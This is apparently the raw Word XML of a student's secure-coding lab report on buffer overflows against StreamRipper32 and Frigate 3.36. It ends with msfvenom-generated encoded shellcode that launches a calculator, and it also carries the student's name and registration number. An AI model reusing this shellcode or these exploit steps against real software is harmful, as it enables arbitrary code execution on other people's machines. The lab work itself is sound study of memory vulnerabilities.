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92B1A" w14:textId="5487BFA7" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB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SECURE CODING LAB – 8 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D04C6C" w14:textId="6F3991D0" w:rsidR="0045582C" w:rsidRDefault="0045582C" w:rsidP="00D907EB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">WORKING WITH MEMORY VULNERABILITIES </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2792B2" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16B12085" w14:textId="1F337E13" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>NAME : SREENIDHI GANACHARI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1578565A" w14:textId="3F0CCE40" w:rsidR="00D907EB" w:rsidRPr="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00D907EB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>REGISTRATION NUMBER : 19BCE7230</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3105F384" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CD92719" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A484CEE" w14:textId="49D05804" w:rsidR="00D907EB" w:rsidRPr="00D25F50" w:rsidRDefault="00D907EB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>1) The payload is generated after running the python exploit code in python 2.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25302728" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64B02FA3" w14:textId="22BC19A2" w:rsidR="00DD541F" w:rsidRDefault="00DE5C71">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A20F0AA" wp14:editId="2C3B9F9F">
            <wp:extent cx="5135880" cy="84213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1747" cy="8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7A2E" w14:textId="5A72DB6D" w:rsidR="00DE5C71" w:rsidRDefault="00DE5C71"/>
    <w:p w14:paraId="0358BE98" w14:textId="7E94771A" w:rsidR="00DE5C71" w:rsidRDefault="00DE5C71"/>
    <w:p w14:paraId="20AA0EE4" w14:textId="2BE286E1" w:rsidR="00DE5C71" w:rsidRDefault="00DE5C71">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="376CDD50" wp14:editId="1E1523E5">
            <wp:extent cx="4815840" cy="215341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8" cy="215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E7F" w14:textId="4BA9168C" w:rsidR="00DE5C71" w:rsidRDefault="00DE5C71"/>
    <w:p w14:paraId="30D2D060" w14:textId="2290D2B6" w:rsidR="00D907EB" w:rsidRDefault="00D907EB"/>
    <w:p w14:paraId="28F04FCF" w14:textId="26327AD0" w:rsidR="00D907EB" w:rsidRDefault="00D907EB"/>
    <w:p w14:paraId="799E4364" w14:textId="5FAAE10B" w:rsidR="00D907EB" w:rsidRDefault="00D907EB"/>
    <w:p w14:paraId="3988548D" w14:textId="3E207672" w:rsidR="00D907EB" w:rsidRDefault="00D907EB"/>
    <w:p w14:paraId="7E6CC95A" w14:textId="2E758F03" w:rsidR="00D907EB" w:rsidRDefault="00D907EB"/>
    <w:p w14:paraId="6EFC2FBE" w14:textId="5BC07B11" w:rsidR="00D907EB" w:rsidRDefault="00D907EB"/>
    <w:p w14:paraId="023E1C83" w14:textId="23D87F32" w:rsidR="00D907EB" w:rsidRDefault="00D907EB"/>
    <w:p w14:paraId="43945E15" w14:textId="2DEA2FF6" w:rsidR="00D907EB" w:rsidRDefault="00D907EB"/>
    <w:p w14:paraId="0C3EAC2A" w14:textId="77777777" w:rsidR="00D907EB" w:rsidRDefault="00D907EB"/>
    <w:p w14:paraId="6F16C703" w14:textId="358D03BC" w:rsidR="00D907EB" w:rsidRPr="00D25F50" w:rsidRDefault="00D907EB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2) The payload generated in Stream Ripper 32 which crashes the application </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E4EA6D" w14:textId="060CEAB0" w:rsidR="00DE5C71" w:rsidRDefault="00DE5C71">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6319BF07" wp14:editId="26CAC30A">
            <wp:extent cx="2520036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7847" cy="308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07DA" w14:textId="085F2A74" w:rsidR="00DE5C71" w:rsidRDefault="00DE5C71"/>
    <w:p w14:paraId="45EC5239" w14:textId="161B2362" w:rsidR="00DE5C71" w:rsidRDefault="00DE5C71"/>
    <w:p w14:paraId="2A2935CD" w14:textId="13B97A5A" w:rsidR="00DE5C71" w:rsidRDefault="00DE5C71">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1417BEA1" wp14:editId="24B8C6AF">
            <wp:extent cx="3162300" cy="1980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840" cy="20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8278" w14:textId="0468A61A" w:rsidR="00DE5C71" w:rsidRDefault="00DE5C71"/>
    <w:p w14:paraId="3DB8D35E" w14:textId="14272E88" w:rsidR="00DE5C71" w:rsidRDefault="00DE5C71">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34929DB3" wp14:editId="5E2722C3">
            <wp:extent cx="3162300" cy="1532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549" cy="15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DEE3" w14:textId="6ECB7ECD" w:rsidR="00DE5C71" w:rsidRDefault="00DE5C71"/>
    <w:p w14:paraId="2182C0E0" w14:textId="302E0EAB" w:rsidR="00044134" w:rsidRDefault="00044134" w:rsidP="00796A44"/>
    <w:p w14:paraId="71F57FEC" w14:textId="77777777" w:rsidR="00044134" w:rsidRDefault="00044134" w:rsidP="00796A44"/>
    <w:p w14:paraId="09F82620" w14:textId="02740DCC" w:rsidR="00044134" w:rsidRPr="00D25F50" w:rsidRDefault="00D907EB" w:rsidP="00796A44">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3) After downloading frigate3.36 if the payload generated is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>run ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the application crashes and it displays the command prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC4E922" w14:textId="36968131" w:rsidR="00044134" w:rsidRDefault="00044134" w:rsidP="00796A44">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72B690B8" wp14:editId="2A1E8A51">
            <wp:extent cx="4566826" cy="2019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7461" cy="20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98B" w14:textId="3DA2097F" w:rsidR="00044134" w:rsidRDefault="00044134" w:rsidP="00796A44"/>
    <w:p w14:paraId="0C532D33" w14:textId="0863722D" w:rsidR="00044134" w:rsidRDefault="00044134" w:rsidP="00796A44">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="799FF6B2" wp14:editId="1B601D52">
            <wp:extent cx="4053840" cy="2373648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116" cy="239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EA0F" w14:textId="2D088312" w:rsidR="00044134" w:rsidRDefault="00044134" w:rsidP="00796A44"/>
    <w:p w14:paraId="3A991392" w14:textId="3E54DBEA" w:rsidR="00044134" w:rsidRDefault="00044134" w:rsidP="00796A44">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B4D8466" wp14:editId="4AA65237">
            <wp:extent cx="4518660" cy="232040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638" cy="2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E31" w14:textId="39420FD2" w:rsidR="00420C0A" w:rsidRDefault="00420C0A" w:rsidP="00796A44"/>
    <w:p w14:paraId="3665B46C" w14:textId="76C76880" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00796A44"/>
    <w:p w14:paraId="5B00EB76" w14:textId="4D55FC89" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00796A44"/>
    <w:p w14:paraId="76C5F878" w14:textId="1B099C56" w:rsidR="00D907EB" w:rsidRPr="00D25F50" w:rsidRDefault="00D907EB" w:rsidP="00796A44">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4) After installing kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vmware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> virtual machine using the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>iso ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> we use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to generate a similar code for a calculator </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03716AEA" w14:textId="69B372DE" w:rsidR="00420C0A" w:rsidRDefault="00420C0A" w:rsidP="00796A44">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62B3AEE5" wp14:editId="468D917F">
            <wp:extent cx="5731510" cy="3072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E654" w14:textId="36F920E6" w:rsidR="00D907EB" w:rsidRDefault="00D907EB" w:rsidP="00796A44"/>
    <w:p w14:paraId="0E6FDF1D" w14:textId="5B440469" w:rsidR="00D907EB" w:rsidRPr="00D25F50" w:rsidRDefault="00D907EB" w:rsidP="00796A44">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25F50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The code for the calculator is as follows </w:t>
      </w:r>
      <w:r w:rsidR="008B38D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2931F624" w14:textId="7CBC9472" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00796A44"/>
    <w:p w14:paraId="030582D2" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>=  b</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05785D27" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\xc1\xd9\x74\x24\xf4\x5d\x55\x59\x49\x49\x49\x49"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759A50BF" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C18AD55" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BE6D79" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397A7B65" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x6a\x48\x6e\x62"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADCB3A0" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x37\x70\x65\x50\x35\x50\x45\x30\x6b\x39\x58\x65\x36"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE3C41C" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x51\x39\x50\x50\x64\x4c\x4b\x76\x30\x74\x70\x4c\x4b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE74EDA" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x76\x32\x66\x6c\x4e\x6b\x52\x72\x52\x34\x6e\x6b\x53"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C8AB3B" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x42\x61\x38\x64\x4f\x4e\x57\x53\x7a\x67\x56\x64\x71"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285DCC74" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x4b\x4f\x6c\x6c\x65\x6c\x63\x51\x73\x4c\x35\x52\x44"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317945B3" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x6c\x67\x50\x6a\x61\x6a\x6f\x36\x6d\x66\x61\x4a\x67"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1473A96A" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x48\x62\x39\x62\x42\x72\x73\x67\x4c\x4b\x36\x32\x32"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343702A1" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x30\x4c\x4b\x43\x7a\x57\x4c\x6e\x6b\x70\x4c\x32\x31"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6C9A07" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x42\x58\x6a\x43\x63\x78\x37\x71\x48\x51\x76\x31\x6c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5DD996" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x4b\x30\x59\x75\x70\x67\x71\x49\x43\x4c\x4b\x52\x69"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D70F734" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x65\x48\x49\x73\x65\x6a\x30\x49\x4e\x6b\x45\x64\x4c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C86A13" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x4b\x63\x31\x39\x46\x44\x71\x39\x6f\x6e\x4c\x6f\x31"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009A08C3" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x5a\x6f\x56\x6d\x75\x51\x7a\x67\x30\x38\x39\x70\x54"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304EDA9D" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x35\x68\x76\x37\x73\x31\x6d\x59\x68\x75\x6b\x33\x4d"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C25853B" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x34\x64\x62\x55\x5a\x44\x53\x68\x6e\x6b\x50\x58\x31"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26750B14" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x34\x67\x71\x68\x53\x75\x36\x4c\x4b\x46\x6c\x52\x6b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7336C9F1" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x6c\x4b\x42\x78\x55\x4c\x47\x71\x4a\x73\x6c\x4b\x45"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EE0DED" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x54\x6c\x4b\x66\x61\x78\x50\x4d\x59\x31\x54\x67\x54"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2298FBD1" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x46\x44\x71\x4b\x53\x6b\x33\x51\x61\x49\x50\x5a\x46"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620135AC" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x31\x4b\x4f\x6d\x30\x31\x4f\x53\x6f\x72\x7a\x6e\x6b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637502E4" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x77\x62\x38\x6b\x4c\x4d\x71\x4d\x43\x5a\x43\x31\x6e"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFCC4E4" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x6d\x4f\x75\x58\x32\x43\x30\x47\x70\x47\x70\x70\x50"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1A0D0E" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x71\x78\x46\x51\x6c\x4b\x42\x4f\x4b\x37\x49\x6f\x6a"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7873D50F" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x75\x4d\x6b\x6a\x50\x6e\x55\x59\x32\x53\x66\x71\x78"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC18DC6" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x4d\x76\x6d\x45\x6f\x4d\x6f\x6d\x79\x6f\x69\x45\x47"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32689902" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x4c\x36\x66\x51\x6c\x66\x6a\x4d\x50\x6b\x4b\x59\x70"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C29E6A" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x50\x75\x66\x65\x6d\x6b\x72\x67\x52\x33\x63\x42\x62"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52444DA8" w14:textId="77777777" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x4f\x53\x5a\x47\x70\x73\x63\x79\x6f\x38\x55\x30\x63"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2163F755" w14:textId="0175B441" w:rsidR="00677608" w:rsidRDefault="00677608" w:rsidP="00677608">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += b"\x43\x51\x50\x6c\x35\x33\x63\x30\x41\x41"</w:t>
      </w:r>
    </w:p>
